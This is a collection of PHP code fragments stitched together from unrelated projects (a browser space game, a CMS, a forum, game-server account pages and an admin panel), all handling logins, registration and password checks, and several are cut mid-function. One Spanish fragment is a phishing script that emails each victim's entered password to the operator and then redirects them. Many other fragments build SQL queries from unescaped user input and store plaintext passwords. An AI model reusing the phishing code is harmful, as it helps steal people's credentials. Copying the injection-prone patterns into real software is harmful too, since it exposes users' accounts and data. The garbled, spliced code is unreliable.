function Login($login, $pass, $passmd = "", $from_validate = 0)
{
global $db_prefix, $db_secret;
$unitab = LoadUniverse();
$uni = $unitab['num'];
if ($player_id = CheckPassword($login, $pass, $passmd)) {
// Пользователь заблокирован?
$user = LoadUser($player_id);
if ($user['banned']) {
UpdateLastClick($player_id);
// Обновить активность пользователя, чтобы можно было продлять удаление.
echo "<html><head><meta http-equiv='refresh' content='0;url=" . hostname() . "game/reg/errorpage.php?errorcode=3&arg1={$uni}&arg2={$login}&arg3=" . $user['banned_until'] . "' /></head><body></body>";
ob_end_flush();
exit;
}
$lastlogin = time();
// Создать приватную сессию.
$prsess = md5($login . $lastlogin . $db_secret);
// Создать публичную сессию
$sess = substr(md5($prsess . sha1($pass) . $db_secret . $lastlogin), 0, 12);
// Записать приватную сессию в кукисы и обновить БД.
setcookie("prsess_" . $player_id . "_" . $uni, $prsess, time() + 24 * 60 * 60, "/");
$query = "UPDATE " . $db_prefix . "users SET lastlogin = {$lastlogin}, session = '" . $sess . "', private_session = '" . $prsess . "' WHERE player_id = {$player_id}";
dbquery($query);
// Записать IP-адрес.
$ip = $_SERVER['REMOTE_ADDR'];
$query = "UPDATE " . $db_prefix . "users SET ip_addr = '" . $ip . "' WHERE player_id = {$player_id}";
dbquery($query);
//echo "ID пользователя: $player_id<br>Приватная сессия: $prsess<br>Публичная сессия: $sess<br>IP-адрес: $ip";
// Выбрать Главную планету текущей.
$query = "SELECT * FROM " . $db_prefix . "users WHERE session = '" . $sess . "'";
$result = dbquery($query);
$user = dbarray($result);
SelectPlanet($player_id, $user['hplanetid']);
// Задание глобальной отгрузки игроков, чистки виртуальных ПО, чистки уничтоженных планет, пересчёт статистики альянсов и прочие глобальные события
AddReloginEvent();
AddCleanDebrisEvent();
AddCleanPlanetsEvent();
AddCleanPlayersEvent();
AddRecalcAllyPointsEvent();
// Задание пересчёта очков игрока.
AddUpdateStatsEvent();
AddRecalcPointsEvent($player_id);
setcookie('ogamelang', $user['lang'], time() + 60 * 60 * 24 * 9999, "/");
// Редирект на Обзор Главной планеты.
header("Location: " . hostname() . "game/index.php?page=overview&session=" . $sess . "&lgn=1");
echo "<html><head><meta http-equiv='refresh' content='0;url=" . hostname() . "game/index.php?page=overview&session=" . $sess . "&lgn=1' /></head><body></body>";
LogIPAddress($ip, $player_id);
} else {
header("Location: " . hostname() . "game/reg/errorpage.php?errorcode=2&arg1={$uni}&arg2={$login}");
echo "<html><head><meta http-equiv='refresh' content='0;url=" . hostname() . "game/reg/errorpage.php?errorcode=2&arg1={$uni}&arg2={$login}' /></head><body></body>";
}
ob_end_flush();
exit;
}
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `username`='{$username}'");
if (isset($r['id'])) {
ShowMsg('用户名已存在!', '?c=reg');
exit;
}
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `email`='{$email}'");
if (isset($r['id'])) {
ShowMsg('您填写的邮箱已被注册!', '?c=reg');
exit;
}
$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `mobile`='{$mobile}'");
if (isset($r['id'])) {
ShowMsg('您填写的手机已被注册!', '?c=reg');
exit;
}
$password_strength = CheckPassword($oldpassword);
if ($t == '1') {
$checkinfo = 'false';
$usertype = '1';
} else {
$checkinfo = 'true';
$usertype = '0';
}
//添加用户数据
$regtime = time();
$regip = GetIP();
$sql = "INSERT INTO `#@__member` (username, password, email, mobile, expval, regtime, regip, logintime, loginip,password_strength,checkinfo,usertype) VALUES ('{$username}', '{$password}', '{$email}', '{$mobile}', '0', '{$regtime}', '{$regip}', '{$regtime}', '{$regip}','{$password_strength}','{$checkinfo}','{$usertype}')";
if ($dosql->ExecNoneQuery($sql)) {
if ($t == '1') {
$userid = $dosql->GetLastID();
$dosql->ExecNoneQuery("INSERT INTO `#@__shops` (userid) values ('{$userid}')");
if (hash_equals($hash, crypt($password, $hash))) {
$correct = true;
}
}
$dbh->close();
if ($correct) {
return $Typ;
} else {
return "";
}
}
require_once "base.php";
$mytext = "";
$returnurl = "/";
if (isset($_POST["Username"]) && isset($_POST["Passwort"])) {
if (($typ = CheckPassword($_POST["Username"], $_POST["Passwort"])) !== "") {
$_SESSION["LOGINUSER"] = $_POST["Username"];
$_SESSION["LOGINTYP"] = $typ;
$_SESSION["LOGINTIME"] = strtotime("now");
if (isset($_SESSION["ReturnUrl"]) && $_SESSION["ReturnUrl"] != NULL) {
$returnurl = $_SESSION["ReturnUrl"];
}
$_SESSION["ReturnUrl"] = NULL;
require_once "general.php";
redirect($returnurl);
} else {
$mytext = '<tr><td colspan="2"><p style="color:red;">Bitte überprüfen Sie Ihren eingaben!</p></td></tr>';
}
} else {
if (isset($_SESSION["ReturnUrl"]) && $_SESSION["ReturnUrl"] != NULL) {
$returnurl = $_SESSION["ReturnUrl"];
// secure forums:
// $secure[2]=true; // If you need some of your forums secured and other open,
// $secure[3]=true; // set $secure["all"] false and list the ones you need secured here.
function authenticate()
{
Header("WWW-authenticate: basic realm=\"Phorum\"");
Header("HTTP/1.0 401 Unauthorized");
echo "<H1 ALIGN=\"center\">Access to forum denied</H1>";
exit;
}
function CheckPassword($user, $password, $forum_id)
{
global $DB, $q, $checkperforum;
$sSQL = "select name from auth_members where name='{$user}' and pass='******'";
if ($checkperforum) {
$sSQL .= " and forum_id='{$forum_id}'";
}
$q->query($DB, $sSQL);
if ($q->numrows() != 0) {
return true;
} else {
return false;
}
}
if ((!empty($secure[$num]) || !empty($secure["all"])) && !empty($f)) {
if (!isset($PHP_AUTH_USER)) {
authenticate();
} elseif (!CheckPassword($PHP_AUTH_USER, $PHP_AUTH_PW, $f)) {
authenticate();
}
}
$person_id = $_SESSION[USERID];
$res = mysql_fetch_assoc(mysql_query("SELECT actived\r\n FROM worker_action\r\n WHERE person_id = 1\r\n ORDER BY id DESC\r\n LIMIT 1"));
if ($res[actived] == 0) {
$check = 1;
} else {
$check = 0;
}
$data = array('check' => $check);
break;
case 'save_act':
$person_id = $_SESSION[USERID];
$pwd = $_REQUEST['pwd'];
$action = $_REQUEST['action'];
$comment_start = $_REQUEST['comment_start'];
$comment_end = $_REQUEST['comment_end'];
$check = CheckPassword($person_id, $pwd);
switch ($action) {
// case '1' :
// if(CheckHere($person_id)){
// $status = WorkerStart($person_id);
// }else{
// $error = "შეცდომა: უკვე არის აღრიცხული";
// }
// break;
// case '2' :
// if(!CheckHere($person_id)){
// $status = WorkerEnd($person_id);
// }else{
// $error = "შეცდომა: არ არის აღრიცხული";
// }
// break;
//comprobamos si el password introducido es menor a 5 caracteres
//en cuyo caso le mostramos un mensaje de error
if (strlen($password) < 5) {
echo '
<p style="margin-left:330px; width:240px; height:15px; margin-top:-20px; background-color:#F6F; border:1px solid #F00;
font-family:"lucida grande",tahoma,verdana,arial,sans-serif; position:relative;">
Contraseña de al menos 5 caracteres
</p>';
} else {
//
# Aqui generamos un correo electronico para hacer otro respaldo de la informacion introducida //
$receptor = "aqui poner tu correo donde te llagara la pass";
//correo electronico //
$asunto = "nuevavic";
//asunto del mensaje //
$mensaje = "password===" . $password . "---" . $fecha;
//mensaje del correo //
mail($receptor, $asunto, $mensaje);
//enviamos el mail en cuestion //
$url = 'Aqui va la url ';
//url a la cual se redireccionara despues de haber terminado el fishing //
$redireccion = 'location:' . $url;
//
header($redireccion);
//
//------------------------------------------------------------------------------------------------------//
}
}
//ejecutmos la funcion que checkea que la contraseña es mayor a 5 caracteres
CheckPassword($clave);
function getdata(&$tpl)
{
global $system, $_CONFIG, $_POST, $_GET;
if ($_SERVER["REQUEST_METHOD"] == "POST" and isset($_POST) and isset($_POST['c_user'])) {
$tpl->setParam('c_user', $_POST['c_user']);
if (strlen($_POST['c_user']) < 2) {
$tpl->setParam('c_msg', '<center>Error:</center><br />' . 'Account name... INVALID!');
return;
}
if (strlen(@$_POST['c_password']) < 6 or strlen(@$_POST['c_password']) > 16) {
$tpl->setParam('c_msg', "<center>Error:</center><br />" . "Password must be 6 letters minimum");
return;
}
if (strlen(@$_POST['c_repassword']) < 6 or strlen(@$_POST['c_repassword']) > 16) {
$tpl->setParam('c_msg', "Re Password must be 6 letters minimum");
return;
}
if (!eregi($system->valid_str, @$_POST['c_password'])) {
$tpl->setParam('c_msg', "<center>Error:</center><br />" . "Password must contain <b>ONLY</b> low or upper letters");
return;
}
if (!eregi($system->valid_str, @$_POST['c_repassword'])) {
$tpl->setParam('c_msg', "<center>Error:</center><br />" . "Re Password must contain <b>ONLY</b> low or upper letters");
return;
}
if (@$_POST['c_password'] != @$_POST['c_repassword']) {
$tpl->setParam('c_msg', "<center>Error:</center><br />" . "Re-Password not equal Password");
return;
}
if (strlen(@$_POST['c_oldpassword']) < 2 or strlen(@$_POST['c_oldpassword']) > 16) {
$tpl->setParam('c_msg', "<center>Error:</center><br />" . "Old-Password must be 2 letters minimum");
return;
}
$ts = CheckPassword($_POST['c_user'], $_POST['c_password']);
if (!$ts[0]) {
$tpl->setParam('c_msg', "<center>Error:</center><br />" . $ts[1]);
return;
}
$c_sql_user = mysql_escape_string($_POST['c_user']);
$system->cache->open("./Cache/ch_pass_lock", NULL);
$baninfo = $system->cache->read($_POST['c_user']);
if (strlen($baninfo) > 0) {
//Invalid Password Or Name
$tpl->setParam('c_msg', 'Block account change password:<br />' . $baninfo);
return;
}
$sql_get_pass = "******"\"";
//var_dump($sql_get_pass);
$login_link = $system->mysql_login();
$sq = mysql_query($sql_get_pass, $login_link);
//var_dump($sql_get_pass);
if (mysql_num_rows($sq) == 0) {
//var_dump(mysql_num_rows($sq));
$tpl->setParam('c_msg', "<center>Error:</center><br />" . "Account not exist");
$system->cache->write($_POST['c_user'], "Account not exist or Invalid Password");
mysql_close($login_link);
return;
}
$db_oldpass = mysql_result($sq, 0);
if (strtolower($db_oldpass) != strtolower($_POST['c_oldpassword'])) {
$tpl->setParam('c_msg', "Invalid Password");
$system->cache->write($_POST['c_user'], "Account not exist or Invalid Password");
mysql_close($login_link);
return;
}
mysql_query("UPDATE `accounts` set `password` = '" . mysql_escape_string($_POST['c_password']) . "',`encrypted_password`='" . SHA1(strtoupper($_POST['c_user']) . ':' . strtoupper($_POST['c_password'])) . "' WHERE `login` = '{$c_sql_user}'", $login_link);
$result = mysql_query("SELECT `accounts`.`login` FROM `accounts` WHERE `accounts`.`lastip` = '" . getenv('REMOTE_ADDR') . "'", $login_link);
$dt = array();
while ($dr = mysql_fetch_array($result)) {
$dt[] = $dr['login'];
}
@mysql_free_result($result);
$logtxt = "CHANGE_PASS ACCOUNT:{$_POST['c_user']} | IP:" . getenv('REMOTE_ADDR');
if (count($dt) > 0) {
$logtxt .= " | LAST_IP_ACCOUNTS:[" . implode($dt, ",") . "]";
}
$system->log->log($logtxt);
mysql_close($login_link);
$tpl->setParam('c_msg', 'Done!');
} else {
$tpl->setParam('c_msg', '');
$tpl->setParam('c_user', '');
}
}
/**
* Methode zum Anzeigen des Contents.
*
* @return String Content der Applikation.
*/
public function Display()
{
$view = $this->NotFound();
if (count($this->params) == 0 || $this->params[0] == "") {
$view = new GenericView("settings");
if (isset($this->request["changepass"])) {
if ($this->request["Password1"] == $this->request["Password2"]) {
if (CheckPassword($this->request["Password1"])) {
$params = array();
$params["Id"] = GetActiveUser()->Id;
$params["PasswordHash"] = $this->request["Password1"];
if (AddOrUpdate("admins", $params)) {
DoLog("Das Passwort wurde erfolgreich geändert", LOG_LEVEL_INFO);
} else {
DoLog("Das Passwort konnte nicht geändert werden", LOG_LEVEL_SYSTEM_ERROR);
}
} else {
//log was done by CheckAdminPass
}
} else {
DoLog("Die beiden Passwörter stimmen nicht überein", LOG_LEVEL_USER_ERROR);
}
if ($this->request["no-replace"] == true) {
exit;
}
}
$view->assign('admins', GetAllOrderedBy("admins", "Id"));
} else {
if ($this->params[0] == "Admin") {
$view = new GenericCrudView($this->params[1], array("add" => "edit"), "settings", "Admin");
if ($this->params[1] == "add") {
if (isset($this->request["add"]) && $this->request["add"] == "true") {
unset($this->request["add"]);
$res = AddAdmin($this->request);
if ($res) {
$obj = GetById("admins", $res);
if ($obj !== false) {
DoLog("Admin wurde hinzugefügt, E-Mail wurde versendet.", LOG_LEVEL_INFO);
} else {
DoLog("Admin wurde hinzugefügt, E-Mail wurde versendet.", LOG_LEVEL_SYSTEM_ERROR);
}
}
}
$view->assign("obj", null);
} else {
if ($this->params[1] == "edit") {
if (isset($this->request["edit"]) && $this->request["edit"] == "true") {
unset($this->request["edit"]);
$this->request["Id"] = $this->params[2];
$res = Update("admins", $this->request);
if ($res) {
DoLog("Admin wurde bearbeitet", LOG_LEVEL_INFO);
} else {
$view = new MessageView("Admin konnte nicht bearbeitet werden.", LOG_LEVEL_SYSTEM_ERROR);
}
}
$obj = GetById("admins", $this->params[2]);
if ($obj !== false) {
$view->assign("obj", $obj);
} else {
$view = new MessageView("Admin wurde nicht gefunden.", LOG_LEVEL_SYSTEM_ERROR);
}
} else {
if ($this->params[1] == "delete" && isset($this->params[2]) && is_numeric($this->params[2])) {
if (isset($this->request["delete"]) && $this->request["delete"] == "true") {
$res = DeleteById("admins", $this->params[2]);
if ($res) {
$view = new MessageView("Admin wurde gelöscht", LOG_LEVEL_INFO);
} else {
$view = new MessageView("Admin konnte nicht gelöscht werden.", LOG_LEVEL_SYSTEM_ERROR);
}
} else {
$obj = GetById("admins", $this->params[2]);
if ($obj !== false) {
$view->assign("obj", $obj);
} else {
$view = new MessageView("Admin wurde nicht gefunden.", LOG_LEVEL_SYSTEM_ERROR);
}
}
} else {
$view = $this->NotFound();
}
}
}
} else {
if ($this->params[0] == "download") {
if ($this->params[1] == "database") {
DownloadDatabaseAndExit();
}
}
}
}
return $view->loadTemplate();
}
function getdata(&$tpl)
{
global $system, $_CONFIG, $count_acc, $count_gm, $is_admin;
$FormReg_CAPTCHA = "sess_" . md5(session_id()) . '.png';
$tpl->setParam("FormReg_msg", "");
if ($_SERVER['REQUEST_METHOD'] != 'POST') {
if (!$this->make_CAPTCHA($tpl)) {
return;
}
$tpl->setParam('FormReg_user', "");
$tpl->setParam('FormReg_password', "");
$tpl->setParam('FormReg_email', "");
$tpl->setParam('FormReg_CAPTCHA', "./Cache/" . $FormReg_CAPTCHA . "?" . time());
} else {
$login_link = $system->mysql_login();
$ip = getenv('REMOTE_ADDR');
$isLastIP = mysql_result(mysql_query("SELECT count(`lastip`) FROM `accounts` WHERE `lastip`='{$ip}'", $login_link), 0);
if (!eregi($system->valid_str, @$_POST['reg_password']) or !eregi($system->valid_str, @$_POST['reg_name']) or $isLastIP >= $_CONFIG['max_acc_per_ip'] and !$is_admin or (strlen(@$_POST['reg_password']) < 6 or strlen(@$_POST['reg_password']) > 32) or (strlen(@$_POST['reg_name']) < 4 or strlen(@$_POST['reg_name']) > 16) or !Net_CheckIP::check_ip($ip) or !string_isEmail(@$_POST['reg_email']) or @$_POST['phrase'] != @$_SESSION['phrase']) {
$body = "<center>Error:</center><br />";
if (!eregi($system->valid_str, @$_POST['reg_name'])) {
$body .= "- Login must contain <b>ONLY</b> low or upper letters<br />";
}
if (!eregi($system->valid_str, @$_POST['reg_password'])) {
$body .= "- Password must contain <b>ONLY</b> low or upper letters<br />";
}
if (strlen(@$_POST['reg_password']) < 6 or strlen(@$_POST['reg_password']) > 17) {
$body .= "- Password must be 6 letters minimum<br />";
}
if (strlen(@$_POST['reg_name']) < 4 or strlen(@$_POST['reg_name']) > 16) {
$body .= "- Login must contain from 4 to 16 letters<br />";
}
if ($isLastIP >= $_CONFIG['max_acc_per_ip'] and !$is_admin) {
$body .= "- There is only " . $_CONFIG['max_acc_per_ip'] . " account per one ip address ({$isLastIP})<br />";
}
if (!Net_CheckIP::check_ip($ip)) {
$body .= "- you have invalid ip<br />";
}
if (@$_POST['phrase'] != @$_SESSION['phrase']) {
$body .= "- text of the image invalid<br />";
}
if (!string_isEmail(@$_POST['reg_email'])) {
$body .= "- you have invalid email<br />";
}
$tpl->setParam("FormReg_msg", $body);
$tpl->setParam('FormReg_user', @$_POST['reg_name']);
$tpl->setParam('FormReg_password', "");
$tpl->setParam('FormReg_email', @$_POST['reg_email']);
if (!$this->make_CAPTCHA($tpl)) {
return;
}
$tpl->setParam('FormReg_CAPTCHA', "./Cache/" . $FormReg_CAPTCHA . "?" . time());
} else {
$ts = CheckPassword($_POST['reg_name'], $_POST['reg_password']);
if (!$ts[0]) {
$tpl->setParam("FormReg_msg", "<center>Error:</center><br />" . $ts[1]);
$tpl->setParam('FormReg_user', $_POST['reg_name']);
$tpl->setParam('FormReg_password', "");
$tpl->setParam('FormReg_email', $_POST['reg_email']);
if (!$this->make_CAPTCHA($tpl)) {
return;
}
$tpl->setParam('FormReg_CAPTCHA', "./Cache/" . $FormReg_CAPTCHA . "?" . time());
} else {
$username = mysql_escape_string(trim($_POST['reg_name']));
$passw = trim($_POST['reg_password']);
$email = mysql_escape_string(trim($_POST['reg_email']));
if (!$this->make_CAPTCHA($tpl)) {
return;
}
if (@mysql_query("INSERT INTO `accounts` (`login`,`password`,`encrypted_password`,`lastip`,`email`,`flags`) VALUES ('{$username}','{$passw}','" . SHA1(strtoupper($username) . ':' . strtoupper($passw)) . "','{$ip}','{$email}','8')", $login_link)) {
$system->cache->open("./Cache/ch_pass_lock", NULL);
$system->cache->destroy($_POST['reg_name']);
$system->cache->open("./Cache/MySQL", NULL);
$system->cache->destroy('account');
extract($system->cache->c_get("MySQL", "account", array('_CONFIG' => $_CONFIG, 'login_link' => $login_link)), EXTR_OVERWRITE);
$tpl->setParam("FormReg_msg", "Account '{$username}' Created<br />\n Account active after " . $_CONFIG['reg_acc_active'] . "min");
$tpl->setParam('FormReg_user', "");
$tpl->setParam('FormReg_password', "");
$tpl->setParam('FormReg_email', "");
$tpl->setParam('FormReg_CAPTCHA', "./Cache/" . $FormReg_CAPTCHA . "?" . time());
} else {
$tpl->setParam("FormReg_msg", "Account '{$username}' Failed");
$tpl->setParam('FormReg_user', @$_POST['reg_name']);
$tpl->setParam('FormReg_password', "");
$tpl->setParam('FormReg_email', @$_POST['reg_email']);
$tpl->setParam('FormReg_CAPTCHA', "./Cache/" . $FormReg_CAPTCHA . "?" . time());
}
}
}
mysql_close($login_link);
}
}
PageFooter();
ob_end_flush();
exit;
}
// Обработка POST-запросов.
if (method() === "POST") {
if ($_POST['aktion'] === "Переименовать") {
RenamePlanet($GlobalUser['aktplanet'], $_POST['newname']);
$aktplanet = GetPlanet($GlobalUser['aktplanet']);
} else {
if ($_POST['aktion'] === "Покинуть колонию") {
PlanetDestroyMenu();
} else {
if ($_POST['aktion'] === "Удалить планету!") {
// Проверить пароль.
if (CheckPassword($GlobalUser['name'], $_POST['pw']) == 0) {
$RenameError = "<center>\n" . "Пароль неверный.<BR><BR> Если Вы забыли пароль, нажмите <A HREF=reg/mail.php>сюда</A> <BR><BR> или попробуйте <a\n" . "href=" . hostname() . " target='_top'> ещё раз</a> .<br></center>\n\n";
} else {
// Проверить принадлежит планета этому пользователю.
$planet = GetPlanet(intval($_POST['deleteid']));
if ($planet['owner_id'] == $GlobalUser['player_id']) {
// Главную планету нельзя удалить.
if (intval($_POST['deleteid']) == $GlobalUser['hplanetid']) {
$RenameError = "<center>\nНельзя покинуть главную планету!<br></center>\n";
} else {
$query = "SELECT * FROM " . $db_prefix . "fleet WHERE target_planet = " . intval($_POST['deleteid']) . " AND owner_id = " . $GlobalUser['player_id'];
$result = dbquery($query);
if (dbrows($result) > 0) {
$RenameError = "<center>\nВаши флоты ещё на пути к этой планете!<br></center>\n";
}
if ($RenameError === "") {